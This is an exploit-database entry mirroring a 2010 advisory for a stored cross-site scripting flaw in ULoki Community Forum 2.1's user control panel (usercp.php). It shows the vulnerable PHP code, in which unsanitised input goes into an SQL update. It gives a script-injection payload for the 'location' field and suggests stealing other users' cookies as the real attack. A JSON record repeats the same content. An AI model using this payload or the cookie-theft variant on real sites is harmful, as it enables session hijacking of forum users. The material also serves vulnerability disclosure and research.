Search...

ULoki Community Forum 2.1 - usercp.php Cross-Site Scripting

2010-02-10T00:00:00

ID EXPLOITPACK:04B65B14834D10320154C96CF4E636A7
Type exploitpack
Reporter Sioma Labs
Modified 2010-02-10T00:00:00

Description

ULoki Community Forum 2.1 - usercp.php Cross-Site Scripting

                                        
                                            # Exploit Title: ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting
# Date: 10/02/2010
# Author: Sioma Labs
# Software Link: http://www.uloki.com/download/uloki_forum_06_may_2009.zip
# Version: v2.1
# Tested on: Windows SP 2 / WAMP
# CVE : 
# Code : 

  ____  _                         _          _         
 / ___|(_) ___  _ __ ___   __ _  | |    __ _| |__  ___ 
 \___ \| |/ _ \| '_ ` _ \ / _` | | |   / _` | '_ \/ __|
  ___) | | (_) | | | | | | (_| | | |___ (_| | |_) \__ \
 |____/|_|\___/|_| |_| |_|\__,_| |_____\__,_|_.__/|___/
                                                       
 ======================================================


xSS Vuln Page

Vuln C0de (usercp.php) 
----------------------

$checke=$db-&gt;count_rows("SELECT email FROM b_users WHERE email='$email' AND userid='$user-&gt;userid'");
if($checke &gt; 0)
{
print "&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;";
$db-&gt;update_data("UPDATE b_users SET mb='$mb', location='$loc' WHERE userid='$user-&gt;userid'");
err_msg("User CP","Your information has been updated.");		
}

-----------------------

http://server/forum/usercp.php


POC
----

place this code on "location" 

"&gt;&lt;script&gt;alert(String.fromCharCode(88, 83, 83));&lt;/script&gt;


--------------------------------------------------------


Note 
----

If an Attacker prefers the attacking process could be done by stealing cookies of other users  

-------------------------
Site: http://siomalabs.com
Author : Sioma Agent 154

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:52", "references": [], "description": "\nULoki Community Forum 2.1 - usercp.php Cross-Site Scripting", "edition": 1, "reporter": "Sioma Labs", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-02-10T00:00:00", "title": "ULoki Community Forum 2.1 - usercp.php Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:52", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2020-04-01T19:04:52", "rev": 2}, "vulnersScore": -0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-02-10T00:00:00", "id": "EXPLOITPACK:04B65B14834D10320154C96CF4E636A7", "href": "", "viewCount": 1, "sourceData": "# Exploit Title: ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting\n# Date: 10/02/2010\n# Author: Sioma Labs\n# Software Link: http://www.uloki.com/download/uloki_forum_06_may_2009.zip\n# Version: v2.1\n# Tested on: Windows SP 2 / WAMP\n# CVE : \n# Code : \n\n ____ _ _ _ \n / ___|(_) ___ _ __ ___ __ _ | | __ _| |__ ___ \n \\___ \\| |/ _ \\| '_ ` _ \\ / _` | | | / _` | '_ \\/ __|\n ___) | | (_) | | | | | | (_| | | |___ (_| | |_) \\__ \\\n |____/|_|\\___/|_| |_| |_|\\__,_| |_____\\__,_|_.__/|___/\n \n ======================================================\n\n\nxSS Vuln Page\n\nVuln C0de (usercp.php) \n----------------------\n\n$checke=$db->count_rows(\"SELECT email FROM b_users WHERE email='$email' AND userid='$user->userid'\");\nif($checke > 0)\n{\nprint \"</td></tr></table>\";\n$db->update_data(\"UPDATE b_users SET mb='$mb', location='$loc' WHERE userid='$user->userid'\");\nerr_msg(\"User CP\",\"Your information has been updated.\");\t\t\n}\n\n-----------------------\n\nhttp://server/forum/usercp.php\n\n\nPOC\n----\n\nplace this code on \"location\" \n\n\"><script>alert(String.fromCharCode(88, 83, 83));</script>\n\n\n--------------------------------------------------------\n\n\nNote \n----\n\nIf an Attacker prefers the attacking process could be done by stealing cookies of other users \n\n-------------------------\nSite: http://siomalabs.com\nAuthor : Sioma Agent 154", "cvss": {"score": 0.0, "vector": "NONE"}}